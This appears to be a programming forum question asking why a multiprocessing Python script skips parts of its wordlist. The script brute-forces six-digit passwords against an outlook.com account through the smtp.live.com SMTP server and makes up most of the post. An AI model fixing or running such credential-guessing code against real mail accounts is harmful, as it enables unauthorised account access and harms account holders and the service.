# Why Does My SMTP Multithreaded Bruteforce Software Ignore Some Of My Wordlist?

Tags: python, multiprocessing

I'm trying to make a penetration testing software in python, but it skips part of the wordlist when I use multiprocessing. I am emulating the wordlist with a six digit password.

It succeeds if I simply write print(value), but with all of the mailserver logins below, it skips part of the values.

```
import smtplib
import multiprocessing

mailserver = smtplib.SMTP('smtp.live.com',587)
mailserver.ehlo()
mailserver.starttls()

def testvalue(value):
    print(value)
    try:
        mailserver.login('email@outlook.com', str(value))
        print(value)
        raise ValueError(value)
    except smtplib.SMTPAuthenticationError:
        nothing=True

pooll=multiprocessing.Pool(12)
pooll.map(testvalue,range(100000,999999))
pooll.close()

mailserver.quit()
```

The results should be a somehow consecutive list of numbers from 100000 to 999999, and a ValueError breakpoint with the actual password. I see numbers with large skips e.g. 200000, 210500, and the list isn't as large as it is supposed to be.

Comment: I said somehow consecutive, meaning that they are not all over the place. I believe this because I made a test with multiprocessing, and they are iterated over the list in order, though they are executed at the same time.